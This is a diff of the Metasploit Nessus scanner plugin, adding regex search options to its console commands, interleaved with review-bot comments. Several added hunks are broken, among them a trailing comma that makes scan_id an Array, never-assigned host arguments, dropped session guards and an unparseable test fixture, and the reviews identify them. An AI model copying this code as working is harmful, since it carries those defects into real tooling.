@@ -84,6 +80,155 @@ module Msf } end + def ncusage + print_status("%redYou must do this before any other commands.%clr") + print_status("Usage: ") + print_status("nessus_connect username:password@hostname:port <ssl_verify>") + print_status("Example:> nessus_connect msf:msf@192.168.1.10:8834") + print_status("OR") + print_status("nessus_connect username@hostname:port ssl_verify") + print_status("Example:> nessus_connect msf@192.168.1.10:8834 ssl_verify") + print_status("OR") + print_status("nessus_connect hostname:port ssl_verify") + print_status("Example:> nessus_connect 192.168.1.10:8834 ssl_verify") + print_status("OR") + print_status("nessus_connect") + print_status("Example:> nessus_connect") + print_status("This only works after you have saved creds with nessus_save") + return + end + + #creates the index of exploit details to make searching for exploits much faster. + def create_xindex + start = Time.now + print_status("Creating Exploit Search Index - (#{xindex}) - this won't take long.") + count = 0 + #Use Msf::Config.get_config_root as the location. + File.open("#{xindex}", "w+") do |f| + #need to add version line. + f.puts(Msf::Framework::Version) + framework.exploits.sort.each { |refname, mod| + stuff = "" + o = nil + begin + o = mod.new + rescue ::Exception + end + stuff << "#{refname}|#{o.name}|#{o.platform_to_s}|#{o.arch_to_s}" + next if not o + o.references.map do |x| + if !(x.ctx_id == "URL") + if (x.ctx_id == "MSB") + stuff << "|#{x.ctx_val}" + else + stuff << "|#{x.ctx_id}-#{x.ctx_val}" + end + end + end + stuff << "\n" + f.puts(stuff) + } + end + total = Time.now - start + print_status("It has taken : #{total} seconds to build the exploits search index") + end + + def nessus_index + if File.exist?("#{xindex}") + #check if it's version line matches current version. + File.open("#{xindex}") { |f| + line = f.readline + line.chomp! 
+ if line.to_i == Msf::Framework::RepoRevision + print_good("Exploit Index - (#{xindex}) - is valid.") + else + create_xindex + end + } + else + create_xindex + end + end + + def nessus_login + if !((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0)) + print_status("You need to connect to a server first.") + ncusage + return + end + @url = "https://#{@host}:#{@port}/" + print_status("Connecting to #{@url} as #{@user}") + @n = Nessus::Client.new(@url, @user, @pass,@sslv) + if @n.authenticated + print_status("User #{@user} authenticated successfully.") + @token = 1 + else + print_error("Error connecting/logging to the server!") + return + end + end + + def nessus_verify_token + if @token.nil? or @token == '' + ncusage + return false + end + true + end + + def valid_policy(*args) + case args.length + when 1 + pid = args[0] + else + print_error("No Policy ID supplied.") + return + end + pol = @n.list_policies + pol["policies"].each { |p| + if p["template_uuid"] == pid + return true + end + } + return false + end + + def nessus_verify_db + if !(framework.db and framework.db.active) + print_error("No database has been configured, please use db_create/db_connect first") + return false + end + true + end + + def check_scan(*args) + case args.length + when 1 + scan_id = args[0] + else + print_error("No scan ID supplied") + return + end + scans = @n.scan_list + scans.each { |scan| + if scan["scans"]["id"] == scan_id && scan["scans"]["status"] == "completed" + return true + end + } + return false + end + + def is_scan_complete(scan_id) + complete = false + status = @n.scan_list + status["scans"].each { |scan| + if scan["id"] == scan_id.to_i && (scan["status"] == "completed" || scan["status"] == "imported") + complete = true + end + } + complete + end + def cmd_nessus_help(*args) tbl = Rex::Ui::Text::Table.new( 'Columns' => [ 
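Review bot: `create_xindex` now writes `Msf::Framework::Version` as the index header, but `nessus_index` in the same hunk still validates it with `line.to_i == Msf::Framework::RepoRevision`, so the writer and the check no longer agree and the index will likely be rebuilt on every call. Comparing like with like, e.g. `if line == Msf::Framework::Version.to_s`, keeps the cache check meaningful. Also in `create_xindex`, `stuff << "#{refname}|#{o.name}|#{o.platform_to_s}|#{o.arch_to_s}"` runs before `next if not o`, so a module whose `mod.new` raised (swallowed by the bare `rescue ::Exception`) hits a NoMethodError on nil instead of being skipped. Moving `next if not o` directly after the `begin`/`rescue` block fixes that.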
@@ -153,82 +298,8 @@ module Msf print_line "" end - def ncusage - print_status("%redYou must do this before any other commands.%clr") - print_status("Usage: ") - print_status("nessus_connect username:password@hostname:port <ssl_verify>") - print_status("Example:> nessus_connect msf:msf@192.168.1.10:8834") - print_status("OR") - print_status("nessus_connect username@hostname:port ssl_verify") - print_status("Example:> nessus_connect msf@192.168.1.10:8834 ssl_verify") - print_status("OR") - print_status("nessus_connect hostname:port ssl_verify") - print_status("Example:> nessus_connect 192.168.1.10:8834 ssl_verify") - print_status("OR") - print_status("nessus_connect") - print_status("Example:> nessus_connect") - print_status("This only works after you have saved creds with nessus_save") - return - end - - #creates the index of exploit details to make searching for exploits much faster. - def create_xindex - start = Time.now - print_status("Creating Exploit Search Index - (#{xindex}) - this won't take long.") - count = 0 - #Use Msf::Config.get_config_root as the location. - File.open("#{xindex}", "w+") do |f| - #need to add version line. - f.puts(Msf::Framework::RepoRevision) - framework.exploits.sort.each { |refname, mod| - stuff = "" - o = nil - begin - o = mod.new - rescue ::Exception - end - stuff << "#{refname}|#{o.name}|#{o.platform_to_s}|#{o.arch_to_s}" - next if not o - o.references.map do |x| - if !(x.ctx_id == "URL") - if (x.ctx_id == "MSB") - stuff << "|#{x.ctx_val}" - else - stuff << "|#{x.ctx_id}-#{x.ctx_val}" - end - end - end - stuff << "\n" - f.puts(stuff) - } - end - total = Time.now - start - print_status("It has taken : #{total} seconds to build the exploits search index") - end - - def nessus_index - if File.exist?("#{xindex}") - #check if it's version line matches current version. - File.open("#{xindex}") { |f| - line = f.readline - line.chomp! 
- if line.to_i == Msf::Framework::RepoRevision - print_good("Exploit Index - (#{xindex}) - is valid.") - else - create_xindex - end - } - else - create_xindex - end - end - - def nessus_verify_token - if @token.nil? or @token == '' - ncusage - return false - end - true + def cmd_nessus_index + nessus_index end def cmd_nessus_connect(*args) @@ -326,24 +397,6 @@ module Msf return end - def nessus_login - if !((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0)) - print_status("You need to connect to a server first.") - ncusage - return - end - @url = "https://#{@host}:#{@port}/" - print_status("Connecting to #{@url} as #{@user}") - @n = Nessus::Client.new(@url, @user, @pass,@sslv) - if @n.authenticated - print_status("User #{@user} authenticated successfully.") - @token = 1 - else - print_error("Error connecting/logging to the server!") - return - end - end - def cmd_nessus_save(*args) #if we are logged in, save session details to nessus.yaml if args[0] == "-h" @@ -370,15 +423,22 @@ module Msf end def cmd_nessus_server_properties(*args) - if args[0] == "-h" - print_status("nessus_server_feed") - print_status("Example:> nessus_server_feed") - print_status() - print_status("Returns information about the feed type and server version.") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_server_properties") + print_status("Example:> nessus_server_properties -S searchterm") + print_status("Returns information about the feed type and server version.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + resp = @n.server_properties tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Feed', 'Type', 
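Review bot: In `cmd_nessus_server_properties`, `search_term = /#{args.shift}/nmi` interpolates the raw `-S` argument into a regex without checking it. When `-S` is the last argument, `args.shift` is nil and the pattern becomes empty (presumably matching every row), and input with an unbalanced `(` or `[` raises RegexpError inside the command handler. If literal matching is wanted, `term = args.shift`, `return print_error("-S requires a search term") if term.nil?` and `search_term = /#{Regexp.escape(term)}/nmi` cover both cases; if regex matching is intended, keep the interpolation but rescue RegexpError and report it. The same line is repeated in the other `cmd_nessus_*` option parsers changed by this diff, and this function's body continues outside the hunk.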
@@ -392,14 +452,21 @@ module Msf end def cmd_nessus_server_status(*args) - if args[0] == "-h" - print_status("nessus_server_status") - print_status("Example:> nessus_server_status") - print_status() - print_status("Returns some status items for the server..") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_server_status") + print_status("Example:> nessus_server_status -S searchterm") + print_status("Returns some status items for the server..") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Status', 'Progress' @@ -410,14 +477,17 @@ module Msf end def cmd_nessus_admin(*args) - if args[0] == "-h" - print_status("nessus_admin") - print_status("Example:> nessus_admin") - print_status() - print_status("Checks to see if the current user is an admin") - print_status("Use nessus_user_list to list all users") - return + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_admin") + print_status("Example:> nessus_admin") + print_status("Checks to see if the current user is an admin") + print_status("Use nessus_user_list to list all users") + return + end end + if !nessus_verify_token return end 
@@ -429,15 +499,21 @@ module Msf end def cmd_nessus_template_list(*args) - if args[0] == "-h" - print_status("nessus_template_list <scan> | <policy>") - print_status("Example:> nessus_template_list scan") - print_status("OR") - print_status("nessus_template_list policy") - print_status() - print_status("Returns a list of information about the scan or policy templates..") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_template_list <scan> | <policy>") + print_status("Example:> nessus_template_list scan -S searchterm") + print_status("OR") + print_status("nessus_template_list policy") + print_status("Returns a list of information about the scan or policy templates..") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + if !nessus_verify_token return end @@ -450,7 +526,6 @@ module Msf print_status("Example:> nessus_template_list scan") print_status("OR") print_status("nessus_template_list policy") - print_status() print_status("Returns a list of information about the scan or policy templates..") return end @@ -465,11 +540,12 @@ module Msf return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Name', 'Title', 'Description', - 'Subscription Only', + 'Subscription Only', 'Cloud Only' ]) list["templates"].each { |template| @@ -479,12 +555,20 @@ module Msf print_line tbl.to_s end - def cmd_nessus_folder_list + def cmd_nessus_folder_list(*args) + search_term = nil + while (arg = args.shift) + case arg + when '-S', '--search' + search_term = /#{args.shift}/nmi + end + end if !nessus_verify_token return end list = @n.list_folders tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "ID", "Name", 
@@ -497,7 +581,19 @@ module Msf print_line tbl.to_s end - def cmd_nessus_scanner_list + def cmd_nessus_scanner_list(*args) + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_scanner_list") + print_status("Example:> nessus_scanner_list -S searchterm") + print_status("Returns information about the feed type and server version.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end + end if !nessus_verify_token return end @@ -506,6 +602,7 @@ module Msf end list = @n.list_scanners tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "ID", "Name", 
@@ -520,40 +617,31 @@ module Msf print_line tbl.to_s end - def check_scan(*args) - case args.length - when 1 - scan_id = args[0] - else - print_error("No scan ID supplied") - return - end - scans = @n.scan_list - scans.each { |scan| - if scan["scans"]["id"] == scan_id && scan["scans"]["status"] == "completed" - return true - end - } - return false - end - def cmd_nessus_report_hosts(*args) - if args[0] == "-h" - print_status("nessus_report_hosts <scan ID>") - print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") - return + search_term = nil + scan_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_report_hosts <scan ID> -S searchterm") + print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + scan_id = arg + end end - case args.length - when 1 - scan_id = args[0] - scan_id = scan_id - else + + if scan_id.nil? print_status("Usage: ") - print_status("nessus_report_hosts <scan ID>") + print_status("nessus_report_hosts <scan ID> -S searchterm") print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") return end + tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "Host ID", "Hostname", 
@@ -576,22 +664,28 @@ module Msf end def cmd_nessus_report_vulns(*args) - if args[0] == "-h" - print_status("nessus_report_vulns <scan ID>") - print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") - return + search_term = nil + scan_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_report_vulns <scan ID> -S searchterm") + print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + scan_id = arg + end end - case args.length - when 1 - scan_id = args[0] - scan_id = scan_id.to_i - else + if scan_id.nil? print_status("Usage: ") print_status("nessus_report_vulns <scan ID>") print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "Plugin ID", "Plugin Name", 
@@ -613,21 +707,29 @@ module Msf end def cmd_nessus_report_host_details(*args) - if args[0] == "-h" - print_status("nessus_report_host_details <scan ID> <host ID>") - print_status("Example:> nessus_report_host_details 10 5") - print_status("Use nessus_scan_list to get list of all scans. Only completed scans can be used for reporting.") - print_status("Use nessus_report_hosts to get a list of all the hosts along with their corresponding host IDs.") - return + search_term = nil + search_vuln = nil + scan_id = nil + host_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_report_host_details <scan ID> <host ID>") + print_status("Example:> nessus_report_host_details 10 5 -S hostinfo -SV vulninfo") + print_status("Use nessus_scan_list to get list of all scans. Only completed scans can be used for reporting.") + print_status("Use nessus_report_hosts to get a list of all the hosts along with their corresponding host IDs.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + when '-SV', '--search-vuln' + search_vuln = /#{args.shift}/nmi + else + scan_id = arg, + host_id = args.shift + end end - if !nessus_verify_token - return - end - case args.length - when 2 - scan_id = args[0] - host_id = args[1] - else + + if [scan_id, host_id].any?(&:nil?) print_status("Usage: ") print_status("nessus_report_host_detail <scan ID> <host ID>") print_status("Example:> nessus_report_host_detail 10 5") @@ -636,6 +738,7 @@ module Msf return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Plugin Name', 'Plugin Famil', @@ -654,6 +757,7 @@ module Msf } print_line tbl.to_s tbl2 = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_vuln, 'Columns' => [ 'Plugin Name', 'Plugin Famil', 
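Review bot: The `else` branch of the new option loop in `cmd_nessus_report_host_details` reads `scan_id = arg,` with a trailing comma, so Ruby parses it together with the next line as `scan_id = [arg, (host_id = args.shift)]` and `scan_id` ends up an Array rather than the ID. Drop the comma so the two lines are `scan_id = arg` and `host_id = args.shift`. The hunk also removes the `if !nessus_verify_token` guard; unless it is re-checked later in the body (outside this hunk), the command can reach the client object before a session exists, so `return if !nessus_verify_token` after option parsing is worth restoring. The guard is dropped the same way in the `cmd_nessus_report_host_ports` and `cmd_nessus_plugin_list` hunks.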
@@ -698,27 +802,32 @@ module Msf end def cmd_nessus_report_host_ports(*args) - if args[0] == "-h" - print_status("nessus_report_host_ports <hostname> <report id>") - print_status("Example:> nessus_report_host_ports 192.168.1.250 f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca") - print_status() - print_status("Returns all the ports associated with a host and details about their vulnerabilities") - print_status("Use nessus_report_hosts to list all available hosts for a report") + search_term = nil + rid = nil + host = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_report_host_ports <hostname> <report id>") + print_status("Example:> nessus_report_host_ports 192.168.1.250 f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca -S searchterm") + print_status("Returns all the ports associated with a host and details about their vulnerabilities") + print_status("Use nessus_report_hosts to list all available hosts for a report") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + scan_id = arg + end end - if !nessus_verify_token - return - end - case args.length - when 2 - host = args[0] - rid = args[1] - else + + if [host,rid].any?(&:nil?) print_status("Usage: ") print_status("nessus_report_host_ports <hostname> <report id>") print_status("Use nessus_report_list to list all available reports") return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Port', 'Protocol', @@ -744,7 +853,6 @@ module Msf if args[0] == "-h" print_status("nessus_report_del <reportname>") print_status("Example:> nessus_report_del f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca") - print_status() print_status("Must be an admin to del reports.") print_status("Use nessus_report_list to list all reports") return 
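Review bot: `cmd_nessus_report_host_ports` can no longer get past its usage message: the `else` branch of the option loop assigns `scan_id = arg`, while the check that follows is `[host,rid].any?(&:nil?)` and neither `host` nor `rid` is ever assigned after being initialised to nil. Assigning the positionals in the order the help text documents, `host = arg` and `rid = args.shift`, restores the command. The function body continues outside the hunk.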
@@ -775,13 +883,19 @@ module Msf end def cmd_nessus_scan_list(*args) - if args[0] == "-h" - print_status("nessus_scan_list") - print_status("Example:> nessus_scan_list") - print_status() - print_status("Returns a list of information about currently running scans.") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_scan_list") + print_status("Example:> nessus_scan_list -S searchterm") + print_status("Returns a list of information about currently running scans.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + if !nessus_verify_token return end @@ -791,6 +905,7 @@ module Msf return else tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Scan ID', 'Name', @@ -891,7 +1006,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_pause <scan id>") print_status("Example:> nessus_scan_pause f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca") - print_status() print_status("Pauses a running scan") print_status("Use nessus_scan_list to list all available scans") return @@ -919,7 +1033,6 @@ module Msf def cmd_nessus_db_scan(*args) if args[0] == "-h" print_status("nessus_db_scan <policy ID> <scan name> <scan description>") - print_status() print_status("Creates a scan based on all the hosts listed in db_hosts.") print_status("Use nessus_policy_list to list all available policies with their corresponding policy IDs") return @@ -966,7 +1079,6 @@ module Msf if args[0] == "-h" print_status("nessus_db_import <scan ID>") print_status("Example:> nessus_db_import 500") - print_status() print_status("Use nessus_scan_list -c to list all completed scans") end if !nessus_verify_db @@ -982,7 +1094,6 @@ module Msf print_status("Usage: ") print_status("nessus_db_import <scan ID>") print_status("Example:> nessus_db_import 500") - print_status() print_status("Use nessus_scan_list -c to list all completed scans") end if is_scan_complete(scan_id) 
@@ -1014,18 +1125,6 @@ module Msf else print_error("Only completed scans could be used for import") end - - end - - def is_scan_complete(scan_id) - complete = false - status = @n.scan_list - status["scans"].each { |scan| - if scan["id"] == scan_id.to_i && (scan["status"] == "completed" || scan["status"] == "imported") - complete = true - end - } - complete end def cmd_nessus_scan_pause_all(*args) @@ -1033,7 +1132,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_pause_all") print_status("Example:> nessus_scan_pause_all") - print_status() print_status("Pauses all currently running scans") print_status("Use nessus_scan_list to list all running scans") return @@ -1061,7 +1159,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_stop <scan id>") print_status("Example:> nessus_scan_stop f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca") - print_status() print_status("Stops a currently running scans") print_status("Use nessus_scan_list to list all running scans") return @@ -1091,7 +1188,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_stop_all") print_status("Example:> nessus_scan_stop_all") - print_status() print_status("stops all currently running scans") print_status("Use nessus_scan_list to list all running scans") return @@ -1119,7 +1215,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_resume <scan id>") print_status("Example:> nessus_scan_resume f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca") - print_status() print_status("resumes a running scan") print_status("Use nessus_scan_list to list all available scans") return @@ -1149,7 +1244,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_resume_all") print_status("Example:> nessus_scan_resume_all") - print_status() print_status("resumes all currently running scans") print_status("Use nessus_scan_list to list all running scans") return 
@@ -1174,35 +1268,39 @@ module Msf end def cmd_nessus_scan_details(*args) - if args[0] == "-h" - print_status("nessus_scan_details <scan ID> <category>") - print_status("Availble categories are info, hosts, vulnerabilities, and history") - print_status("Use nessus_scan_list to list all available scans with their corresponding scan IDs") - return + valid_categories = ['info', 'hosts', 'vulnerabilities', 'history'] + search_term = nil + scan_id = nil + category = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("Usage: ") + print_status("nessus_scan_details <scan ID> <category> -S searchterm") + print_status("Availble categories are info, hosts, vulnerabilities, and history") + print_status("Use nessus_scan_list to list all available scans with their corresponding scan IDs") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + scan_id = arg + if args[0].in?(valid_categories) + category = args.shift + else + print_error("Invalid category. The available categories are info, hosts, vulnerabilities, and history") + return + end + end end + if !nessus_verify_token return end - case args.length - when 2 - scan_id = args[0] - category = args[1] - if category.in?(['info', 'hosts', 'vulnerabilities', 'history']) - category = args[1] - else - print_error("Invalid category. The available categories are info, hosts, vulnerabilities, and history") - return - end - else - print_status("Usage: ") - print_status("nessus_scan_details <scan ID> <category>") - print_status("Availble categories are info, hosts, vulnerabilities, and history") - print_status("Use nessus_scan_list to list all available scans with their corresponding scan IDs") - return - end + details = @n.scan_details(scan_id) if category == "info" tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "Status", "Policy", 
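Review bot: `cmd_nessus_scan_details` lost its usage fallback: when no scan ID is given, the loop never reaches its `else` branch, `scan_id` and `category` stay nil, and execution continues to `details = @n.scan_details(scan_id)` with nil. A guard after option parsing, matching the sibling commands, avoids that request: `if scan_id.nil? || category.nil?` followed by the existing usage lines and `return`. Separately, the category check looks only at `args[0]`, so `<scan ID> -S term <category>` is rejected as an invalid category; that ordering may be intentionally unsupported, but the help text does not say so. The function body continues outside the hunk.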
@@ -1214,6 +1312,7 @@ module Msf tbl << [ details["info"]["status"], details["info"]["policy"], details["info"]["name"], details["info"]["targets"], details["info"]["scan_start"], details["info"]["scan_end"] ] elsif category == "hosts" tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "Host ID", "Hostname", @@ -1227,6 +1326,7 @@ module Msf } elsif category == "vulnerabilities" tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "Plugin ID", "Plugin Name", @@ -1238,6 +1338,7 @@ module Msf } elsif category == "history" tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "History ID", "Status", @@ -1319,27 +1420,31 @@ module Msf end def cmd_nessus_plugin_list(*args) - if args[0] == "-h" - print_status("nessus_plugin_list <Family ID>") - print_status("Example:> nessus_plugin_list 10") - print_status() - print_status("Returns a list of all plugins in that family.") - print_status("Use nessus_family_list to display all the plugin families along with their corresponding family IDs") - return + search_term = nil + family_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_plugin_list <Family ID> -S searchterm") + print_status("Example:> nessus_plugin_list 10") + print_status("Returns a list of all plugins in that family.") + print_status("Use nessus_family_list to display all the plugin families along with their corresponding family IDs") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + family_id = arg + end end - if !nessus_verify_token - return - end - case args.length - when 1 - family_id = args[0] - else + + if family_id.nil? print_status("Usage: ") print_status("nessus_plugin_list <Family ID>") print_status("Use nessus_family_list to display all the plugin families along with their corresponding family IDs") return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Plugin ID', 'Plugin Name' 
@@ -1355,21 +1460,28 @@ module Msf end def cmd_nessus_family_list(*args) - if args[0] == "-h" - print_status("nessus_family_list") - print_status("Example:> nessus_family_list") - print_status() - print_status("Returns a list of all the plugin families along with their corresponding family IDs and plugin count.") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_family_list") + print_status("Example:> nessus_family_list -S searchterm") + print_status("Returns a list of all the plugin families along with their corresponding family IDs and plugin count.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + list = @n.list_families tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Family ID', 'Family Name', 'Number of Plugins' ]) - list.each { |family| + list['families'].each { |family| tbl << [ family["id"], family["name"], family["count"] ] } print_line 
@@ -1377,27 +1489,35 @@ module Msf end def cmd_nessus_plugin_details(*args) - if args[0] == "-h" - print_status("nessus_plugin_details <Plugin ID>") - print_status("Example:> nessus_plugin_details 10264") - print_status() - print_status("Returns details on a particular plugin.") - print_status("Use nessus_plugin_list to list all plugins and their corresponding plugin IDs belonging to a particular plugin family.") - return + search_term = nil + plugin_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_plugin_details <Plugin ID>") + print_status("Example:> nessus_plugin_details 10264 -S searchterm") + print_status("Returns details on a particular plugin.") + print_status("Use nessus_plugin_list to list all plugins and their corresponding plugin IDs belonging to a particular plugin family.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + plugin_id = arg + end end + if !nessus_verify_token return end - case args.length - when 1 - plugin_id = args[0] - else + + if plugin_id.nil? print_status("Usage: ") print_status("nessus_plugin_details <Plugin ID>") print_status("Use nessus_plugin_list to list all plugins and their corresponding plugin IDs belonging to a particular plugin family.") return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Reference', 'Value' 
@@ -1423,13 +1543,19 @@ module Msf end def cmd_nessus_user_list(*args) - if args[0] == "-h" - print_status("nessus_user_list") - print_status("Example:> nessus_user_list") - print_status() - print_status("Returns a list of the users on the Nessus server and their access level.") - return + scan_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_user_list") + print_status("Example:> nessus_user_list -S searchterm") + print_status("Returns a list of the users on the Nessus server and their access level.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + if !nessus_verify_token return end @@ -1438,6 +1564,7 @@ module Msf end list=@n.list_users tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'ID', 'Name', @@ -1493,7 +1620,6 @@ module Msf if args[0] == "-h" print_status("nessus_user_del <User ID>") print_status("Example:> nessus_user_del 10") - print_status() print_status("This command can only delete non admin users. You must be an admin to delete users.") print_status("Use nessus_user_list to list all users with their corresponding user IDs") return @@ -1574,13 +1700,19 @@ module Msf end def cmd_nessus_policy_list(*args) - if args[0] == "-h" - print_status("nessus_policy_list") - print_status("Example:> nessus_policy_list") - print_status() - print_status("Lists all policies on the server") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_policy_list") + print_status("Example:> nessus_policy_list -S searchterm") + print_status("Lists all policies on the server") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + if !nessus_verify_token return end 
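Review bot: `cmd_nessus_user_list` initialises `scan_id = nil`, which is never used, where the sibling commands initialise `search_term = nil`. The later `'SearchTerm' => search_term` still evaluates to nil when `-S` is absent only because Ruby defines the local at parse time, which is easy to break when the method is next edited. Replace the first added line with `search_term = nil`.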
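Review bot: `cmd_nessus_policy_list` parses `-S` into `search_term` and advertises it in the help text, but no hunk in this diff adds `'SearchTerm' => search_term` to the table this command builds, so the option appears to have no effect. The table construction lies outside the hunk; if it is unchanged, add `'SearchTerm' => search_term,` as the first entry of its `Rex::Ui::Text::Table.new(` call.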
@@ -1607,7 +1739,6 @@ module Msf if args[0] == "-h" print_status("nessus_policy_del <policy ID>") print_status("Example:> nessus_policy_del 1") - print_status() print_status("You must be an admin to delete policies.") print_status("Use nessus_policy_list to list all policies with their corresponding policy IDs") return @@ -1642,31 +1773,6 @@ module Msf print_error("Unknown problem occured by deleting the user account having user ID #{user_id}.") end end - - def valid_policy(*args) - case args.length - when 1 - pid = args[0] - else - print_error("No Policy ID supplied.") - return - end - pol = @n.list_policies - pol["policies"].each { |p| - if p["template_uuid"] == pid - return true - end - } - return false - end - - def nessus_verify_db - if !(framework.db and framework.db.active) - print_error("No database has been configured, please use db_create/db_connect first") - return false - end - true - end end def initialize(framework, opts) diff --git a/spec/factories/mdm/module_details.rb b/spec/factories/mdm/module_details.rb index c67f200128..63fdb2276b 100644 --- a/spec/factories/mdm/module_details.rb +++ b/spec/factories/mdm/module_details.rb @@ -1,6 +1,6 @@ FactoryGirl.modify do factory :mdm_module_detail do - ignore do + transient do root { Metasploit::Framework.root } diff --git a/spec/file_fixtures/modules/auxiliary/auxiliary_tidy.rb b/spec/file_fixtures/modules/auxiliary/auxiliary_tidy.rb new file mode 100644 index 0000000000..4296c95404 --- /dev/null +++ b/spec/file_fixtures/modules/auxiliary/auxiliary_tidy.rb @@ -0,0 +1,21 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Auxiliary + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Tidy Auxiliary Module for RSpec' + 'Description' => 'Test!' + }, + 'Author' => %w(Unknown), + 'License' => MSF_LICENSE, + ) + ) + end +end 
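Review bot: The new fixture `auxiliary_tidy.rb` is not valid Ruby as written: `'Name' => 'Tidy Auxiliary Module for RSpec'` has no trailing comma, and the `},` two lines later closes a brace that was never opened. If the spec that consumes it ever loads or syntax-checks the file, the "tidy" case fails for a reason unrelated to what it is meant to test; `auxiliary_untidy.rb` carries the same two lines. Ending the `'Name'` line with a comma and deleting the stray `},` makes both fixtures parseable. How the fixtures are consumed is not visible in this diff.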
